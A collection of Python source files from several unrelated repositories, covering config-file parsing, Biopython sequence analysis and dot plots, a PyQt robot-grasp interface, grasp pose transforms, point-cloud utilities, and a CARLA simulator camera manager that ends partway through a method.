replace_str_in_file(config_file, "%MAXCOMPUTE_ENDPOINT%", endpoint)
replace_str_in_file(config_file, "%HOLOGRES_HOST%", holo_host)
replace_str_in_file(config_file, "%HOLOGRES_PORT%", holo_port)
replace_str_in_file(config_file, "%HOLOGRES_DB%", holo_db)
if __name__ == "__main__":
bootstrap()
``` |
{
"source": "777moneymaker/python_course_extras",
"score": 4
} |
#### File: python_course_extras/lab8/lab8_extra.py
```python
from pathlib import Path
__author__ = '<NAME>'
def main():
file = Path(__file__).parent.joinpath('lotto_history.txt')
with open(file, 'r') as fh:
lines = [line.split(' ')[2].rstrip() for line in fh]
numbers = [int(num) for line in lines for num in line.split(',')]
f_count = lambda x: (x, numbers.count(x))
results = map(f_count, set(numbers))
print(*sorted(results, key=lambda x: -x[1])[:10], sep='\n')
if __name__ == '__main__':
main()
``` |
{
"source": "777moneymaker/sjp_sequence",
"score": 2
} |
#### File: 777moneymaker/sjp_sequence/play.py
```python
import sys
import Plot
from Sequence import Sequence
__author__ = '<NAME>'
__license__ = "MIT"
__version__ = "1.0"
__status__ = "Production"
def main():
sq = Sequence(size=5000, seq_type='D')
sq.read_from_fasta('dr.fasta')
sq.blast_search()
Plot.plot_from_fasta('dr.fasta', 'dy.fasta', sys.argv[1])
if __name__ == '__main__':
main()
```
#### File: 777moneymaker/sjp_sequence/Plot.py
```python
import sys
from Bio import SeqIO
from Bio.Blast import NCBIXML
from matplotlib import pylab
def plot_from_xml(fn1=None, fnx=None, window=7):
"""Makes a dot-plot from xml and fasta sequence.
:param fn1: Fasta file.
:param fnx: XML file.
:param window: Threshold, for example (5)'
:return: None
"""
if fn1 is not None and fnx is not None:
with open(fn1, 'r') as fh, open(fnx, 'r') as fx:
window = int(window)
file1 = NCBIXML.read(fh)
filex = NCBIXML.read(fx)
seq_one = str(file1.seq).upper()
seq_two = str(filex.seq).upper()
data = [[(seq_one[i:i + window] != seq_two[j:j + 5]) for j in range(len(seq_one) - window)] for i
in range(len(seq_two) - window)]
pylab.gray()
pylab.imshow(data)
pylab.xlabel(
'{} (length {} bp)'.format(file1.seq, len(file1.seq)))
pylab.ylabel(
'{} (length {} bp)'.format(filex.seq, len(filex.seq)))
pylab.title('Dot plot using window size {}\n(allowing no mis-matches)'.format(window))
pylab.show()
def plot_from_fasta(fn1=None, fn2=None, window=7):
"""Makes a dot-plot two fasta files.
:param fn1: Fasta file.
:param fn2: Fasta file.
:param window: Threshold, for example (5)
:return: None
"""
if fn1 is not None and fn2 is not None:
with open(fn1, 'r') as fh1, open(fn2, 'r') as fh2:
window = int(window)
file1 = SeqIO.read(fh1, format='fasta')
file2 = SeqIO.read(fh2, format='fasta')
dict_one = {}
dict_two = {}
for (seq, section_dict) in [(str(file1.seq).upper(), dict_one),
(str(file2.seq).upper(), dict_two)]:
for i in range(len(seq) - window):
section = seq[i:i + window]
try:
section_dict[section].append(i)
except KeyError:
section_dict[section] = [i]
matches = set(dict_one).intersection(dict_two)
print('{} unique matches'.format(len(matches)))
x, y = [], []
for section in matches:
for i in dict_one[section]:
for j in dict_two[section]:
x.append(i)
y.append(j)
pylab.cla()
pylab.gray()
pylab.scatter(x, y)
pylab.xlim(0, len(file1) - window)
pylab.ylim(0, len(file2) - window)
pylab.xlabel('{} (length {} bp)'.format(file1.id, len(file1.seq)))
pylab.ylabel('{} (length {} bp)'.format(file2.id, len(file2.seq)))
pylab.title('Dot plot using window size {}\n(allowing no mis-matches)'.format(window))
pylab.show()
if __name__ == '__main__':
if sys.argv[4] == 'xml':
plot_from_xml(sys.argv[1], sys.argv[2], sys.argv[3])
elif sys.argv[4] == 'fasta':
plot_from_fasta(sys.argv[1], sys.argv[2], sys.argv[3])
else:
pass
```
#### File: 777moneymaker/sjp_sequence/Sequence.py
```python
import os
import random
from string import ascii_uppercase, digits
from Bio import Seq, SeqUtils, SeqIO, SeqRecord
from Bio.Alphabet import IUPAC
from Bio.Blast import NCBIWWW, NCBIXML
from matplotlib import pylab
__author__ = '<NAME>'
__license__ = "MIT"
__version__ = "1.0"
__status__ = "Production"
class Sequence:
dna_bases = IUPAC.IUPACUnambiguousDNA.letters
rna_bases = IUPAC.IUPACUnambiguousRNA.letters
amino_acids = IUPAC.IUPACProtein.letters
def __init__(self, size: int = 100, seq_type: str = 'D', id: str = None, seq=None):
"""Creates random Sequence of given size and type.
:param size: Size of sequence.
:param seq_type: Sequence type, D = DNA, R = RNA, P = Protein.
:param id: ID of sequence.
:param seq: Ready Sequence object.
"""
self.s_type = {'D': 'DNA', 'R': 'RNA', 'P': 'PROTEIN'}[str(seq_type)]
# If size is not multiple of 3, then make it bigger
self.size = size if not size % 3 else size + (3 - size % 3)
# If sequence is not none and if it's instance of Sequence class
self.seq = seq if seq else self.generate_sequence()
self.id = id if id else ''.join(random.choice(ascii_uppercase) for i in range(2)) + '_' \
+ ''.join(random.choice(digits) for i in range(random.randint(4, 7)))
self.record = SeqRecord.SeqRecord(self.seq, id=self.id)
def show(self):
"""Prints sequence of object and it's ID.
:return: None
"""
print('Sequence: {}\nID: {}'.format(self.seq, self.id))
def generate_sequence(self):
"""Generates random sequence based on type.
:return: Bio.Seq object.
"""
if self.s_type not in {'DNA', 'RNA', 'PROTEIN'}:
raise TypeError('Wrong type of sequence')
else:
if self.s_type == 'DNA':
seq = Seq.Seq(''.join(random.choice(Sequence.dna_bases) for i in range(self.size)))
elif self.s_type == 'RNA':
seq = Seq.Seq(''.join(random.choice(Sequence.rna_bases) for i in range(self.size)))
else:
seq = Seq.Seq(''.join(random.choice(Sequence.amino_acids) for i in range(self.size)))
return seq
def calculate_gc(self):
"""Calculates the GC percent in sequence.
:return: Float number - GC percent.
"""
if self.s_type == 'PROTEIN':
raise TypeError('GC are not in {} sequence'.format(self.s_type))
return SeqUtils.GC(self.seq)
def transcribe(self):
"""Transcribes to RNA sequence if sequence is type D (DNA).
:return: Seq object of type RNA.
"""
if self.s_type != 'DNA':
raise TypeError('Sequence type {} can not be transcribed.'.format(self.s_type))
return Seq.Seq.transcribe(self.seq)
def translate(self):
"""Translates to Protein sequence if sequence type is R (RNA).
:return: Seq object of type Protein.
"""
if self.s_type != 'RNA':
raise TypeError('Sequence type {} can not be translated.'.format(self.s_type))
return Seq.Seq.translate(self.seq)
def reversed_transcription(self):
"""Given the seq of type RNA transcribes it to DNA.
:return: Seq object of type DNA.
"""
if self.s_type != 'RNA':
raise TypeError('Sequence type {} can not be transcribed in reverse.'.format(self.s_type))
return Seq.back_transcribe(self.seq)
def get_complement(self):
"""Creates iterator of all bases in complement sequence.
:return: Complement sequence iterator.
"""
return Seq.reverse_complement(self.seq)
def get_sequence_elems(self):
"""Creates iterator of all bases in sequence.
:return: Sequence iterator.
"""
for base in self.seq:
yield base
def get_complement_elems(self):
"""Gives the complement strand of sequence.
:return: Complement Seq iterator.
"""
for base in Seq.reverse_complement(self.seq):
yield base
def save_to_fasta(self, fn=None, description='None'):
"""Saves sequence to file in fasta format.
:param fn: Filename.
:param description: Record description
:return: None
"""
if fn is None:
fn = '{}.fasta'.format(self.record.id)
self.record.description = description
try:
with open(fn, 'w') as fl:
SeqIO.write(self.record, handle=fl, format='fasta')
fl.close()
except OSError as exc:
print(exc)
else:
print('File {} saved!'.format(fn))
def read_from_fasta(self, fn=None):
"""Reads SeqRecord from file.
If given file doesn't exists, the method takes first file in current directory.
:param fn: Filename of fasta file.
:return: True if file was loaded, else False
"""
if fn is None:
for fn in os.listdir(os.curdir):
if not fn.endswith('.fasta'):
continue
with open(fn, 'r') as fl:
self.record = SeqIO.read(fl, 'fasta')
self.seq = self.record.seq
self.id = self.record.id
fl.close()
print('File {} loaded!'.format(fn))
return True
else:
self.record = SeqIO.read(fn, 'fasta')
self.seq = self.record.seq
self.id = self.record.id
print('File {} loaded!'.format(fn))
return True
return False
def blast_search(self, fn=None, dot_plot=False, window=8):
"""Makes a blast search.
:param fn: File in which results will be saved.
:param dot_plot: True/False - show dot plot of two sequences or not.
:param window: Threshold, for example (5)
:return: None
"""
if self.s_type == 'DNA' or self.s_type == 'RNA':
try:
print('Task running...')
income = NCBIWWW.qblast('blastn', 'nt', self.record.format('fasta'))
except ValueError:
income = None
else:
try:
print('Task running...')
income = NCBIWWW.qblast('blastp', 'pdb', self.record.format('fasta'))
print('Got results!')
except ValueError:
income = None
if income is not None:
if fn is None:
with open('results/{}_blast_results.xml'.format(self.id), 'w') as of:
of.write(income.read())
of.close()
else:
with open(fn, 'w') as of:
of.write(income.read())
of.close()
result = NCBIXML.read(income)
align = result.alignment[0]
print(align.title)
print(align.lenght)
print(align.hsps[0].expect)
print(align.hsps[0].query[0:70] + '...')
print(align.hsps[0].match[0:70] + '...')
print(align.hsps[0].sbjct[0:70] + '...')
if dot_plot:
seq_one = str(align.hsps[0].query).upper()
seq_two = str(align.hsps[0].match).upper()
data = [[(seq_one[i:i + window] != seq_two[j:j + window]) for j in range(len(seq_one) - window)] for i
in range(len(seq_two) - window)]
pylab.gray()
pylab.imshow(data)
pylab.xlabel('{} (length {} bp)'.format(align.hsps[0].query, len(align.hsps[0].query)))
pylab.ylabel('{} (length {} bp)'.format(align.hsps[0].match, len(align.hsps[0].match)))
pylab.title('Dot plot using window size {}\n(allowing no mis-matches)'.format(window))
pylab.show()
else:
raise ValueError("No sequence found!")
``` |
{
"source": "777nancy/confile",
"score": 3
} |
#### File: confile/confile/confile.py
```python
import ast
import configparser
import json
import os
from abc import ABCMeta
from abc import abstractmethod
from typing import Union
import yaml
class NoDatesSafeLoader(yaml.SafeLoader):
@classmethod
def remove_implicit_resolver(cls):
if 'yaml_implicit_resolvers' not in cls.__dict__:
cls.yaml_implicit_resolvers = cls.yaml_implicit_resolvers.copy()
for first_letter, mappings in cls.yaml_implicit_resolvers.items():
cls.yaml_implicit_resolvers[first_letter] = [(tag, regexp)
for tag, regexp in mappings
if tag != 'tag:yaml.org,2002:timestamp']
class BaseConfig(metaclass=ABCMeta):
"""
This is an interface for all config classes.
"""
@abstractmethod
def get_property(self, key, *keys):
pass
@abstractmethod
def to_dict(self):
pass
class IniConfig(BaseConfig):
"""
Class for ini config file.
"""
def __init__(self, config_path: str, encoding: str = None, default_section: str = 'DEFAULT') -> None:
"""
Initialize attributes for ini config
:param config_path: ini config file path
:param encoding: file encoding
:param default_section: default section for ini config file
"""
self._default_section = default_section
self._config_dict = {}
self._has_default_section = False
parser = configparser.ConfigParser(default_section=None)
parser.read(config_path, encoding)
for section in parser.sections():
if section == default_section:
self._has_default_section = True
section_dict = {}
for key, value in parser.items(section):
try:
value = ast.literal_eval(value)
except (SyntaxError, ValueError):
pass
section_dict[key] = value
self._config_dict[section] = section_dict
def get_property(self, section: str, key: str = None) -> Union[str, list, dict, None]:
"""
Get property from arguments
:param section: section
:param key: key
:return: property
"""
section_dict = self._config_dict.get(section)
if key and section_dict is not None:
value = section_dict.get(key)
if value is None and self._has_default_section:
value = self._config_dict.get(self._default_section).get(key)
return value
else:
return section_dict
def to_dict(self) -> dict:
"""
Ini config file to dict
:return: dict of ini config file contents
"""
return self._config_dict
class JsonOrYamlConfig(BaseConfig):
"""
Super class for Json or Yaml config file class.
"""
def __init__(self, config_path: str, file_type: str, encoding: str = None) -> None:
"""
Initialize attributes for json or yaml config
:param config_path: ini config file path
:param file_type: json or yaml(yml)
:param encoding: file encoding
:raise TypeError: if file_type is not json or yaml(yml)
"""
file_type = file_type.lower()
with open(config_path, encoding=encoding) as fin:
if file_type == 'json':
self._config_dict = json.load(fin)
elif file_type in ['yml', 'yaml']:
NoDatesSafeLoader.remove_implicit_resolver()
self._config_dict = yaml.load(fin, Loader=NoDatesSafeLoader)
else:
raise TypeError('Unknown file type {}'.format(file_type))
def get_property(self, key: str, *keys: list) -> Union[str, list, dict, None]:
"""
get property from arguments
:param key: key
:param keys: keys
:return: property
"""
if type(self._config_dict) is list:
return None
sub_config_dict = self._config_dict.get(key)
if keys and sub_config_dict is not None:
for k in keys:
if type(sub_config_dict) is not dict or sub_config_dict is None:
return None
value = sub_config_dict.get(k)
sub_config_dict = value
return sub_config_dict
else:
return sub_config_dict
def to_dict(self) -> dict:
"""
config file to dict
:return: dict of config file contents
"""
return self._config_dict
class JsonConfig(JsonOrYamlConfig):
"""
Class for json config file.
"""
def __init__(self, config_path: str, encoding: str = None) -> None:
super().__init__(config_path, 'json', encoding)
class YamlConfig(JsonOrYamlConfig):
"""
Class for yaml config file.
"""
def __init__(self, config_path: str, encoding: str = None) -> None:
super().__init__(config_path, 'yaml', encoding)
def read_config(config_path: str, file_type: str = None, encoding: str = None,
default_section: str = None) -> Union[IniConfig, JsonConfig, YamlConfig]:
"""
Read config file
:param config_path: config file path
:param file_type: file type of config file
:param encoding: encoding
:param default_section: default section of ini config file (ini config file only)
:return: Config object
:raise TypeError: if file_type is not ini or json or yaml(yml)
"""
if file_type is None:
_, ext = os.path.splitext(config_path)
file_type = ext[1:]
file_type = file_type.lower()
if file_type == 'ini':
return IniConfig(config_path, encoding, default_section)
elif file_type == 'json':
return JsonConfig(config_path, encoding)
elif file_type in ['yml', 'yaml']:
return YamlConfig(config_path, encoding)
else:
raise TypeError('Unknown file type {}'.format(file_type))
``` |
{
"source": "777PolarFox777/kanban-flask",
"score": 3
} |
#### File: models/card/model.py
```python
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship
from backend.app import db
class Card(db.Model):
__tablename__ = "cards"
id = db.Column(db.Integer(), primary_key=True)
text = db.Column(db.String(500))
order = db.Column(db.Integer())
column_id = db.Column(db.Integer(), ForeignKey("columns.id"))
def __init__(self, json: dict):
if "text" in json and "order" in json and "columnId" in json:
self.text = json["text"]
self.order = json["order"]
self.column_id = json["columnId"]
else:
raise TypeError("Incorrect initial data in Card model")
def __repr__(self):
return f"<Card {self.id}>"
def json(self):
return {"id": self.id, "text": self.text, "order": self.order, "columnId": self.column_id}
``` |
{
"source": "779786738/anygrasp",
"score": 3
} |
#### File: anygrasp/history/Ui.py
```python
import PyQt5
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtGui, QtWidgets
import sys
import cv2
class ui(QtWidgets.QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.setObjectName("MainWindow")
self.resize(800, 600)
self.setStyleSheet("")
self.centralwidget = QtWidgets.QWidget(self)
self.centralwidget.setObjectName("centralwidget")
self.capture = QtWidgets.QPushbutton(self.centralwidget)
self.capture.setGeometry(QtCore.QRect(160, 430, 111, 61))
self.capture.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.capture.setObjectName("capture")
self.grasp = QtWidgets.QPushbutton(self.centralwidget)
self.grasp.setGeometry(QtCore.QRect(360, 430, 111, 61))
self.grasp.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.grasp.setObjectName("grasp")
self.put = QtWidgets.QPushbutton(self.centralwidget)
self.put.setGeometry(QtCore.QRect(560, 430, 101, 61))
self.put.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.put.setObjectName("put")
self.change_pic_pos = QtWidgets.QPushbutton(self.centralwidget)
self.change_pic_pos.setGeometry(QtCore.QRect(210, 30, 141, 71))
self.change_pic_pos.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.change_pic_pos.setObjectName("change_pic_pos")
self.set_put_pos = QtWidgets.QPushbutton(self.centralwidget)
self.set_put_pos.setGeometry(QtCore.QRect(430, 30, 131, 71))
self.set_put_pos.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.set_put_pos.setObjectName("set_put_pos")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(240, 180, 291, 171))
self.label.setObjectName("label")
self.label.setStyleSheet("background:white")
self.retranslateUi()
self.connect_event()
def retranslateUi(self):
_translate = QtCore.QCoreApplication.translate
self.capture.setText(_translate("MainWindow", "拍照"))
self.grasp.setText(_translate("MainWindow", "抓取"))
self.put.setText(_translate("MainWindow", "放置"))
self.change_pic_pos.setText(_translate("MainWindow", "切换拍照姿态"))
self.set_put_pos.setText(_translate("MainWindow", "设置放置姿态"))
def connect_event(self):
self.capture.clicked.connect(self.printself)
self.grasp.clicked.connect(self.printself)
self.put.clicked.connect(self.printself)
self.change_pic_pos.clicked.connect(self.printself)
self.set_put_pos.clicked.connect(self.printself)
def printself(self):
print("pushed!")
def keyPressEvent(self, event):#重新实现了keyPressEvent()事件处理器。
#按住键盘事件
#这个事件是PyQt自带的自动运行的,当我修改后,其内容也会自动调用
if event.key() == QtCore.Qt.Key_Escape:#当我们按住键盘是esc按键时
print("esc")
self.close()#关闭程序
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = ui()
ex.show()
sys.exit(app.exec_())
```
#### File: anygrasp/poseTransForm/poseTransform.py
```python
import numpy as np
from math import pi
from scipy.spatial.transform import Rotation as Rot
import json
np.set_printoptions(suppress=True)
DYNAMIC = False
STATIC = True
# 齐次变换到笛卡尔坐标
def transfrom2RPY(Trans,mode = "xyz"):
Trans = np.matrix(Trans)
R = Trans[:3,:3] # rotation matrix
T = np.matrix(Trans[:3,3]).T # translation
Eur = Rot.from_matrix(R)
Eur = Eur.as_euler(mode,False)
T = np.array(T)
return np.hstack((list(T[0]),Eur)) # 6DoF
# 算法输出到齐次变换
def getRR(R,T):
R = np.array(R)
T = np.matrix(T)
E = [[ 0, -1 , 0],
[ 0 , 0 ,-1],
[ 1 , 0, 0]]
E = np.array(E)
R_fixed = np.matmul(R,E.T) # 修正之后的R
print(R_fixed)
res = np.vstack((np.hstack((R_fixed,T.T)),np.array([0,0,0,1])))
return res
def getRR_V2(RR,TT):
R = np.matrix(RR)
T = np.matrix(TT)
E1 = [[0, 0, 1],
[ 0 , -1 ,0],
[ 1 , 0, 0]]
E2 = [[ 0,0, -1],
[ 0 , 1 ,0],
[ 1 , 0, 0]]
r = Rot.from_euler('xyz',[0,0,np.pi/2])
E1 = np.array(E1)
E1 = np.matmul(r.as_matrix(),E1)
E2 = np.array(E2)
E2 = np.matmul(r.as_matrix(),E2)
R1_fixed = np.matmul(R,E1.T) # 修正之后的R1
R2_fixed = np.matmul(R,E2.T) # 修正之后的R2
trans1 = np.vstack((np.hstack((R1_fixed,T.T)),np.array([0,0,0,1])))
trans2 = np.vstack((np.hstack((R2_fixed,T.T)),np.array([0,0,0,1])))
if(np.array(trans1)[0][0]>0):
return trans1
return trans2
# 获取齐次变换矩阵
# Euler : 角度
# T : 平移
def getTransform(m:str,Euler,T,Mode:bool):
if Mode == True:
m = m.lower()
else:
m = m.upper()
E = np.array(Euler)
T = np.matrix(T)
r = Rot.from_euler(m,E)
return np.vstack((np.hstack((r.as_matrix(),T.T)),np.array([0,0,0,1])))
def finally_succ(curPos, RR, TT):
with open("./config.json",'r') as load_f:
load_dict = json.load(load_f)
Bais = load_dict['cameraPose']
TT =np.array(TT)*1000 + np.array(Bais)
Trans1 = getTransform("xyz",curPos[3:],np.array(curPos[:3]),STATIC) # on base the tool
Trans2 = getRR(RR,TT) # on camera the target
# on tool the camera is I
Trans3 = np.dot(Trans1,Trans2) # on base the target
return transfrom2RPY(Trans3)
def GG_2_Liner_move(gg, curPos):
with open("./config.json",'r') as load_f:
load_dict = json.load(load_f)
Bais = load_dict['cameraPose']
RR = list(gg.rotation_matrices)[0]
TT = list(gg.translations)
return finally_succ(curPos,RR,TT,toolBais)
def finally_succ_V2(curPos, RR, TT):
with open("./config.json",'r') as load_f:
load_dict = json.load(load_f)
Bais = load_dict['cameraPose']
TT =np.array(TT)*1000 + np.array(Bais)
Trans1 = getTransform("xyz",curPos[3:],np.array(curPos[:3]),STATIC) # on base the tool
Trans2 = getRR_V2(RR,TT) # on camera the target
# on tool the camera is I
Trans3 = np.dot(Trans1,Trans2) # on base the target
return transfrom2RPY(Trans3)
def GG_2_Liner_move_V2(gg, curPos):
RR = list(gg.rotation_matrices)[0]
TT = list(gg.translations)[0]
return finally_succ_V2(curPos,RR,TT)
```
#### File: anygrasp/utils/data_utils.py
```python
import numpy as np
class CameraInfo():
""" Camera intrisics for point cloud creation. """
def __init__(self, width, height, fx, fy, cx, cy, scale):
self.width = width
self.height = height
self.fx = fx
self.fy = fy
self.cx = cx
self.cy = cy
self.scale = scale
def create_point_cloud_from_depth_image(depth, camera, organized=True):
""" Generate point cloud using depth image only.
Input:
depth: [numpy.ndarray, (H,W), numpy.float32]
depth image
camera: [CameraInfo]
camera intrinsics
organized: bool
whether to keep the cloud in image shape (H,W,3)
Output:
cloud: [numpy.ndarray, (H,W,3)/(H*W,3), numpy.float32]
generated cloud, (H,W,3) for organized=True, (H*W,3) for organized=False
"""
assert(depth.shape[0] == camera.height and depth.shape[1] == camera.width)
xmap = np.arange(camera.width)
ymap = np.arange(camera.height)
xmap, ymap = np.meshgrid(xmap, ymap)
points_z = depth / camera.scale
points_x = (xmap - camera.cx) * points_z / camera.fx
points_y = (ymap - camera.cy) * points_z / camera.fy
cloud = np.stack([points_x, points_y, points_z], axis=-1)
if not organized:
cloud = cloud.reshape([-1, 3])
return cloud
def transform_point_cloud(cloud, transform, format='4x4'):
""" Transform points to new coordinates with transformation matrix.
Input:
cloud: [np.ndarray, (N,3), np.float32]
points in original coordinates
transform: [np.ndarray, (3,3)/(3,4)/(4,4), np.float32]
transformation matrix, could be rotation only or rotation+translation
format: [string, '3x3'/'3x4'/'4x4']
the shape of transformation matrix
'3x3' --> rotation matrix
'3x4'/'4x4' --> rotation matrix + translation matrix
Output:
cloud_transformed: [np.ndarray, (N,3), np.float32]
points in new coordinates
"""
if not (format == '3x3' or format == '4x4' or format == '3x4'):
raise ValueError('Unknown transformation format, only support \'3x3\' or \'4x4\' or \'3x4\'.')
if format == '3x3':
cloud_transformed = np.dot(transform, cloud.T).T
elif format == '4x4' or format == '3x4':
ones = np.ones(cloud.shape[0])[:, np.newaxis]
cloud_ = np.concatenate([cloud, ones], axis=1)
cloud_transformed = np.dot(transform, cloud_.T).T
cloud_transformed = cloud_transformed[:, :3]
return cloud_transformed
def compute_point_dists(A, B):
""" Compute pair-wise point distances in two matrices.
Input:
A: [np.ndarray, (N,3), np.float32]
point cloud A
B: [np.ndarray, (M,3), np.float32]
point cloud B
Output:
dists: [np.ndarray, (N,M), np.float32]
distance matrix
"""
A = A[:, np.newaxis, :]
B = B[np.newaxis, :, :]
dists = np.linalg.norm(A-B, axis=-1)
return dists
def remove_invisible_grasp_points(cloud, grasp_points, pose, th=0.01):
""" Remove invisible part of object model according to scene point cloud.
Input:
cloud: [np.ndarray, (N,3), np.float32]
scene point cloud
grasp_points: [np.ndarray, (M,3), np.float32]
grasp point label in object coordinates
pose: [np.ndarray, (4,4), np.float32]
transformation matrix from object coordinates to world coordinates
th: [float]
if the minimum distance between a grasp point and the scene points is greater than outlier, the point will be removed
Output:
visible_mask: [np.ndarray, (M,), np.bool]
mask to show the visible part of grasp points
"""
grasp_points_trans = transform_point_cloud(grasp_points, pose)
dists = compute_point_dists(grasp_points_trans, cloud)
min_dists = dists.min(axis=1)
visible_mask = (min_dists < th)
return visible_mask
def get_workspace_mask(cloud, seg, trans=None, organized=True, outlier=0):
""" Keep points in workspace as input.
Input:
cloud: [np.ndarray, (H,W,3), np.float32]
scene point cloud
seg: [np.ndarray, (H,W,), np.uint8]
segmantation label of scene points
trans: [np.ndarray, (4,4), np.float32]
transformation matrix for scene points, default: None.
organized: [bool]
whether to keep the cloud in image shape (H,W,3)
outlier: [float]
if the distance between a point and workspace is greater than outlier, the point will be removed
Output:
workspace_mask: [np.ndarray, (H,W)/(H*W,), np.bool]
mask to indicate whether scene points are in workspace
"""
if organized:
h, w, _ = cloud.shape
cloud = cloud.reshape([h*w, 3])
seg = seg.reshape(h*w)
if trans is not None:
cloud = transform_point_cloud(cloud, trans)
foreground = cloud[seg>0]
xmin, ymin, zmin = foreground.min(axis=0)
xmax, ymax, zmax = foreground.max(axis=0)
mask_x = ((cloud[:,0] > xmin-outlier) & (cloud[:,0] < xmax+outlier))
mask_y = ((cloud[:,1] > ymin-outlier) & (cloud[:,1] < ymax+outlier))
mask_z = ((cloud[:,2] > zmin-outlier) & (cloud[:,2] < zmax+outlier))
workspace_mask = (mask_x & mask_y & mask_z)
if organized:
workspace_mask = workspace_mask.reshape([h, w])
return workspace_mask
``` |
{
"source": "77abe77/Collaborative-Denoising-Autoencoder",
"score": 3
} |
#### File: Collaborative-Denoising-Autoencoder/datasets/CiteYouLikeA.py
```python
import os
from datasets.AbstractInputSource import AbstractInputSource
import numpy as np
class CiteYouLikeA(AbstractInputSource):
FILE_PATH = '/home/abemillan/Developer/CDAE_ML/datasets/citeulike-a/users.dat'# TODO make this path always work: os.path.abs(__file__)
def _loop_through_file_with_fn(self, fn):
# TODO
pass
def _calculate_item_count(self, n_items=0):
with open(self.FILE_PATH, 'rb') as input_file:
for user in input_file:
user = user.strip()
user = user.split()[1:]
for item in user:
if int(item) > n_items:
n_items = int(item)
return (n_items + 1)
def load_data_as_sparse(self):
with open(self.FILE_PATH, 'rb') as input_file:
for user in input_file:
user = user.strip()
user = user.split()[1:]
full_items = np.array([int(item) for item in user[1:]])
train_indices, test_indices = self.rand_split_data(full_items)
train_data = self._make_sparse_from_raw_set(train_indices)
test_data = test_indices
full_data = self._make_sparse_from_raw_set(full_items)
self.data.append(self.Data(train_data, test_data, full_data))
def load_data(self):
with open(self.FILE_PATH, 'rb') as input_file:
for user in input_file:
user = user.strip()
user = user.split()[1:]
full_items = np.array([int(item) for item in user[1:]])
train_indices, test_indices = self.rand_split_data(full_items)
train_data = [1.0 if item in train_indices else 0.0 for item in xrange(self.n_items)]
test_data = test_indices
full_data = [1.0 if item in full_items else 0.0 for item in xrange(self.n_items)]
self.data.append(self.Data(train_data, test_data, full_data))
```
#### File: models/tests/CDAE_testing.py
```python
import tensorflow as tf
from models import CDAE
class CDAETesting(tf.test.TestCase):
def setUp(self):
self.CDAE_test = CDAE()
def test_variable_packing(self):
X = tf.constant()
with
def test_presision(self):
test_set_positive_indicies = np.array([55, 32, 89, 49])
model_result = np.random.random_sample(100)
def test_recall(self):
pass
def test_MAP(self):
pass
if __name__ == '__main__':
tf.test.main()
``` |
{
"source": "77hanzzi/CARLA-Multi-ADAS-Functions",
"score": 3
} |
#### File: 77hanzzi/CARLA-Multi-ADAS-Functions/New_CameraManager.py
```python
class CameraManager(object):
def __init__(self, parent_actor, hud):
self.sensor = None
self.SupportingSensors = []
self._surface = None
# self._surface_1 = pygame.Surface((hud.dim[0]/4,hud.dim[1]/4))
self._parent = parent_actor
self._hud = hud
self._SupportSurfaceList = [pygame.Surface((hud.dim[0]/3.5,hud.dim[1]/3.5)) for i in range(1,4)]
self._recording = False
self._camera_transforms = [
carla.Transform(carla.Location(x=-10, z=4.8), carla.Rotation(pitch=-17)),
carla.Transform(carla.Location(x=1.6, z=1.7)),
carla.Transform(carla.Location(x=0.1,y=-0.3, z=1.2), carla.Rotation(pitch=-15)),
carla.Transform(carla.Location(x=-5.5, z=2.8), carla.Rotation(pitch=-15)),
carla.Transform(carla.Location(x=0.2, z=1.6), carla.Rotation(pitch=0)),
]
self._transform_index = 1
self._sensors = [
['sensor.camera.rgb', cc.Raw, 'Camera RGB'],
['sensor.camera.depth', cc.Raw, 'Camera Depth (Raw)'],
['sensor.camera.depth', cc.Depth, 'Camera Depth (Gray Scale)'],
['sensor.camera.depth', cc.LogarithmicDepth, 'Camera Depth (Logarithmic Gray Scale)'],
['sensor.camera.semantic_segmentation', cc.Raw, 'Camera Semantic Segmentation (Raw)'],
['sensor.camera.semantic_segmentation', cc.CityScapesPalette, 'Camera Semantic Segmentation (CityScapes Palette)'],
['sensor.lidar.ray_cast', None, 'Lidar (Ray-Cast)']]
self._blueprints = self._parent.get_world().get_blueprint_library()
self._world = self._parent.get_world()
bp_library = self._world.get_blueprint_library()
for item in self._sensors:
bp = bp_library.find(item[0])
if item[0].startswith('sensor.camera'):
bp.set_attribute('image_size_x', str(hud.dim[0]))
bp.set_attribute('image_size_y', str(hud.dim[1]))
elif item[0].startswith('sensor.lidar'):
bp.set_attribute('range', '5000')
item.append(bp)
self._index = None
def set_support_sensors(self):
bp_library = self._blueprints
bp_SupportingSensors = []
for item in self._sensors:
bp = bp_library.find(item[0])
if item[0].startswith('sensor.camera'):
bp.set_attribute('image_size_x', str(self._hud.dim[0]/3.5))
bp.set_attribute('image_size_y', str(self._hud.dim[1]/3.5))
elif item[0].startswith('sensor.lidar'):
bp.set_attribute('range', '5000')
bp_SupportingSensors.append(bp)
Camera_1 = self._world.spawn_actor(
bp_SupportingSensors[5],
self._camera_transforms[4],
attach_to=self._parent)
Camera_2 = self._world.spawn_actor(
bp_SupportingSensors[0],
self._camera_transforms[2],
attach_to=self._parent)
Camera_3 = self._world.spawn_actor(
bp_SupportingSensors[3],
self._camera_transforms[4],
attach_to=self._parent)
self.SupportingSensors.append(Camera_1)
self.SupportingSensors.append(Camera_2)
self.SupportingSensors.append(Camera_3)
weak_self = weakref.ref(self)
Camera_1.listen(lambda image: CameraManager._camera1_display(weak_self,image))
Camera_2.listen(lambda image: CameraManager._camera2_display(weak_self,image))
Camera_3.listen(lambda image: CameraManager._camera3_display(weak_self,image))
def toggle_camera(self):
# This is used to change the installation location of the sensors or cameras.
self._transform_index = (self._transform_index + 1) % len(self._camera_transforms)
self.sensor.set_transform(self._camera_transforms[self._transform_index])
def set_sensor(self, index, notify=True):
self.set_support_sensors()
index = index % len(self._sensors)
needs_respawn = True if self._index is None \
else self._sensors[index][0] != self._sensors[self._index][0]
if needs_respawn:
if self.sensor is not None:
self.sensor.destroy()
self._surface = None
self.sensor = self._parent.get_world().spawn_actor(
self._sensors[index][-1],
self._camera_transforms[self._transform_index],
attach_to=self._parent)
